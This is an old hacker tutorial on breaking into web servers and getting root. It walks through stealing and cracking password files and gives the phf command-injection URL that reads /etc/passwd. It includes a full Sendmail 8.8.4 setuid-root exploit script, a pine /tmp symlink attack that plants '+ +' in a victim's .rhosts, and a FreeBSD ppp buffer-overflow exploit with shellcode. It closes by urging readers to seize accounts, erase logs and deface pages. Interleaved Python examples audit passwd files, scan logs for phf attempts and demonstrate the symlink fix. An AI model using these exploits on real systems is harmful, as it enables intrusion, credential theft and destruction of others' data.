
Crackzter - Hacking Websites

Author : Crackzter
Well, Psychotic wrote one of the most helpful unix text files in cyberspace, but with the mail that we received after the release of our famous 36 page Unix Bible we realised that unix isn't for everybody, so we decided that we should write on another aspect of hacking... Virtual Circuit and Psychotic are proud to release "Hacking Webpages With a few Other Techniques." We will discuss a few various ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects.
Getting the Password File Through FTP
Ok, well, one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need to learn a little about the password file...
root:User:7Bg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUy5X88tv28:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file.
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
This is another example of a password file, only this one has one little difference: it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker (both explained later in the text). Below is another example of a shadowed password file:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/greg:/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Shadowed password files have an "x" in the place of a password, or sometimes they are disguised as an * as well.
Now that you know a little more about what the actual password file looks like, you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.
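The distinction above (a readable crypt hash in field two versus an "x" or "*" placeholder) is something a defender can check mechanically. The following is an added example for this page, not the text's own code: it parses passwd(5)-format lines, classifies each entry as exposed, shadowed or empty, and also flags any non-root account with uid 0, since such an account is a second superuser. Note that the text's own shadowed listing contains exactly that case (smtp with uid 0). The sample file is constructed; the function and field names are mine.

```python
"""Classify /etc/passwd entries as exposed, shadowed or empty, and flag extra uid-0 accounts.

Added example for this page; it is not the text's own code. Field layout follows
passwd(5): name:password:uid:gid:gecos:home:shell. The sample below is constructed,
except the smtp line, which is copied from the shadowed listing in the text.
"""

# Placeholders that mean "the hash is elsewhere" or "account locked" on common Unixes.
SHADOW_MARKERS = {"x", "*", "!", "!!", "*LK*", "NP"}


def classify_password_field(field):
    """Return 'empty', 'shadowed' or 'exposed' for the second passwd field."""
    if field == "":
        return "empty"        # no password at all: login needs none
    if field in SHADOW_MARKERS or field[0] in "*!":
        return "shadowed"     # real hash (if any) lives in a root-only shadow file
    return "exposed"          # a crypt(3) hash that anyone who can read this file can attack offline


def parse_passwd_line(line):
    """Parse one passwd line; return None for comments, blanks and malformed lines."""
    line = line.rstrip("\n")
    if not line or line.startswith("#"):
        return None
    parts = line.split(":")
    if len(parts) < 4:
        return None
    try:
        uid = int(parts[2])
    except ValueError:
        return None
    return {
        "user": parts[0],
        "uid": uid,
        "status": classify_password_field(parts[1]),
    }


def audit_passwd(text):
    """Group users by password status and list non-root accounts with uid 0."""
    findings = {"exposed": [], "shadowed": [], "empty": [], "extra_uid0": []}
    for line in text.splitlines():
        entry = parse_passwd_line(line)
        if entry is None:
            continue
        findings[entry["status"]].append(entry["user"])
        if entry["uid"] == 0 and entry["user"] != "root":
            findings["extra_uid0"].append(entry["user"])   # a second superuser account
    return findings


# Constructed sample: two old-style entries that still carry hashes, plus shadowed ones.
SAMPLE_PASSWD = """\
root:EUy5X88tv28Ab:0:1:Superuser:/:/bin/csh
tomjones:p5Y(h0tiC7Qz.:1229:20:Tom Jones:/usr/people/tomjones:/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
smtp:x:0:0:mail daemon user:/:
guest::500:500:Guest account:/home/guest:/bin/sh
nobody:*:60001:60001:uid no body:/:
"""

if __name__ == "__main__":
    for status, users in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{status:>11}: {', '.join(users) or '-'}")
```

Run against a real file with `audit_passwd(open("/etc/passwd").read())`. Anything in the "exposed" or "empty" lists, and anything in "extra_uid0", is what the cracking procedure in the next section feeds on, so those are the entries to fix first (move hashes to a shadow file, set a password, remove or re-uid the account).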
Cracking a password file isn't as complicated as it would seem, although the files vary from system to system.
1. The first step that you would take is to download or copy the file.
2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker, there are a few ok ones out there. I recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose (ASCII, caps, lowercase, and numeric letters may also be added). We will be releasing our password file to the public soon; it will be called Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation.
3. You then start up the cracker and follow the directions that it gives you.
The PHF Technique
Well, I wasn't sure if I should include this section, due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf, I decided to include it.
The phf technique is by far the easiest way of getting a password file (although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
You replace webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type:
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
and that's it! You just sit back and copy the file (if it works).
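The request above leaves a very recognisable trace in a web server's access log: a hit on /cgi-bin/phf with a %0a (newline) in the query string, which old phf passed straight to a shell. The following is an added example for this page, not part of the original text: a small scanner for Common Log Format lines that URL-decodes each query and flags a newline or a /etc/passwd reference, and records whether the server answered 200 with a body, which is the sign the command actually ran. It goes slightly beyond the text's single URL in that it catches variants fetching something other than the password file and newline injection against CGIs other than phf. The log lines are constructed and the function names are mine.

```python
"""Flag phf-style command injection attempts in Common Log Format access logs.

Added example for this page, not part of the original text. The request the text
shows abuses two things: the /cgi-bin/phf program and a %0a (newline) in the query
string, which old phf handed to a shell. The scanner URL-decodes each query and
reports a newline or a /etc/passwd reference, so it also catches variants that fetch
something other than the password file. Log lines are constructed.
"""
import re
from urllib.parse import unquote, urlsplit

# Common Log Format: host ident authuser [date] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def inspect_request(url):
    """Return the list of reasons a request looks like a phf injection (empty if clean)."""
    parts = urlsplit(url)
    query = unquote(parts.query)          # turn %0a back into a real newline, %20 into a space
    reasons = []
    if "\n" in query or "\r" in query:
        reasons.append("newline-in-query")   # the metacharacter phf failed to strip
    if "/etc/passwd" in query:
        reasons.append("passwd-path")
    if reasons and parts.path.endswith("/phf"):
        reasons.insert(0, "phf-cgi")
    return reasons


def scan_access_log(lines):
    """Parse each log line and collect the suspicious ones with their parsed fields."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_request(m.group("url"))
        if not reasons:
            continue
        status = int(m.group("status"))
        hits.append({
            "host": m.group("host"),
            "time": m.group("time"),
            "url": m.group("url"),
            "status": status,
            # A 200 with a body is the signal that the server actually ran the command.
            "likely_success": status == 200 and m.group("size") not in ("-", "0"),
            "reasons": reasons,
        })
    return hits


# Constructed sample log: one normal page view, two phf attempts, one ordinary phf lookup.
SAMPLE_LOG = [
    '10.0.0.7 - - [26/Aug/1997:19:05:01 -0400] "GET /index.html HTTP/1.0" 200 1043',
    '10.0.0.9 - - [26/Aug/1997:19:05:07 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1512',
    '10.0.0.9 - - [26/Aug/1997:19:05:30 -0400] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/id HTTP/1.0" 404 290',
    '10.0.0.3 - - [26/Aug/1997:19:06:02 -0400] "GET /cgi-bin/phf?Qalias=jones HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["host"], hit["status"], ",".join(hit["reasons"]), hit["url"])
```

The ordinary phf lookup (`Qalias=jones`) is deliberately not reported: the CGI itself was legitimate, the injected newline is the attack. The fix on the server side, then as now, was to remove phf from cgi-bin entirely.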
Telnet and Exploits
Well, exploits are the best way of hacking webpages, but they are also more complicated than hacking through ftp or using the phf. Before you can set up an exploit you must first have a telnet proggie; there are many different clients, you can just do a netsearch and find everything you need.
It's best to get an account with your target (if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each separately. I'm going to list a few below, but the list of exploits is endless.
This exploit is known as Sendmail v.8.8.4.
It creates a suid program /tmp/x that calls shell as root. This is how you set it up:
# (the header names inside the three C programs were lost in extraction; restored to what the code needs)
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include <unistd.h>
int main(void)
{
execl(RUN,RUN,NULL);
}
_EOF_
# spawnfish starts sendmail with argv[0] set to /tmp/smtpd
cat << _EOF_ >/tmp/spawnfish.c
#include <unistd.h>
int main(void)
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
# smtpd is what that sendmail re-executes (still as root) on HUP; it makes /tmp/x setuid root
cat << _EOF_ >/tmp/smtpd.c
#include <stdlib.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
# compile all three
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
# start it, then HUP the sendmail that shows up as /tmp/smtpd in the process table
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
And now on to another exploit. I'm going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile. Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts (for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.
This was written by Sean B. Hamor. For this example, hamors is the victim while catluvr is the attacker:
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
-rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
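The root cause in the transcript is not pine-specific: a program creates a file with a predictable name in a world-writable directory using a plain O_CREAT open, which follows whatever symlink is already sitting at that name. The following is an added example for this page, not code from the text or from pine: it reproduces that behaviour inside a private scratch directory (a dangling symlink at the transcript's lockfile name, pointing at a stand-in for ~hamors/.rhosts), then shows the two standard fixes, opening with O_CREAT|O_EXCL|O_NOFOLLOW, which refuses to create through an existing path or symlink, and using an unpredictable name via mkstemp. It assumes a POSIX system (Linux or macOS); all file and function names are mine.

```python
"""Reproduce the /tmp symlink race's root cause and the fix, in a scratch directory.

Added example for this page, not part of the original text. The pine lockfile problem
happens because a file is created at a predictable name in a shared directory with a
plain O_CREAT open, which follows a pre-planted symlink. The 'unsafe' routine shows
that; the 'safe' routine uses O_CREAT|O_EXCL|O_NOFOLLOW, and mkstemp gives an
unpredictable name on top of that. Everything happens under a private mkdtemp dir.
"""
import errno
import os
import stat
import tempfile


def create_lockfile_unsafe(path, content):
    """Plain O_CREAT: if `path` is a symlink, the kernel follows it and creates the target."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT, 0o666)
    try:
        os.write(fd, content)
    finally:
        os.close(fd)


def create_lockfile_safe(path, content):
    """O_EXCL fails if anything exists at `path` (a symlink counts); O_NOFOLLOW never traverses one."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    try:
        os.write(fd, content)
    finally:
        os.close(fd)


def run_demo():
    """Return a dict describing what each creation strategy did to the planted symlink."""
    scratch = tempfile.mkdtemp(prefix="lockdemo-")   # private stand-in for /tmp
    target = os.path.join(scratch, "victim_rhosts")  # stand-in for ~hamors/.rhosts
    lockfile = os.path.join(scratch, ".302.f5a4")    # the predictable name from the transcript
    os.symlink(target, lockfile)                     # dangling symlink planted at that name
    result = {}

    # 1. The pine-style open: the write lands in the symlink's target.
    create_lockfile_unsafe(lockfile, b"1732\n")
    result["unsafe_wrote_through_symlink"] = os.path.isfile(target)
    if os.path.exists(target):
        os.remove(target)

    # 2. The hardened open: refused with EEXIST (or ELOOP), target never created.
    try:
        create_lockfile_safe(lockfile, b"1732\n")
        result["safe_refused"] = False
    except OSError as exc:
        result["safe_refused"] = exc.errno in (errno.EEXIST, errno.ELOOP)
    result["safe_target_created"] = os.path.exists(target)

    # 3. Unpredictable name plus O_EXCL: nothing to pre-plant a link at.
    fd, tmpname = tempfile.mkstemp(dir=scratch, prefix=".lock-")
    os.close(fd)
    result["mkstemp_is_regular_file"] = stat.S_ISREG(os.lstat(tmpname).st_mode)

    os.remove(tmpname)
    os.remove(lockfile)
    os.rmdir(scratch)
    return result


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

On a modern Linux host the `fs.protected_symlinks` sysctl additionally blocks following symlinks owned by another user in sticky world-writable directories such as /tmp, which is the kernel-level mitigation for exactly this class of race; the demo runs in a private directory so it shows the underlying open(2) behaviour regardless of that setting.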
Now on to another one; this will be the last one that I'm going to show. Exploitation script for the ppp vulnerability as described by no one to date; this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesn't work. This is how you set it up:
#include <stdlib.h> /* header names were lost in extraction; these are the ones the code needs */
#include <string.h>
#include <unistd.h>
#define BUFFER_SIZE 156 /* size of the buffer to overflow */
#define OFFSET -290 /* number of bytes to jump after the start of the buffer */
long get_esp(void) { __asm__("movl %esp,%eax\n"); } /* i386 only: leaves the stack pointer in eax as the return value */
int main(int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */
int i;
buf = malloc(4096);
/* fill start of buffer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);
ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];
/* follow it with 104 bytes of guessed return addresses, then terminate the string */
addr_ptr = (unsigned long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
/* the oversized value is delivered through the HOME environment variable */
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);
return 1; /* only reached if execl fails */
}
Now that you've gotten root, "what's next?" Well, the choice is up to you, but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while; you can now upload your pages, delete all the logs and just plain do your worst! Psychotic writes our own exploits and we will be releasing them soon, so keep your eyes open for them. We recommend that if you are serious about learning ethical hacking that you download our Unix Bible.
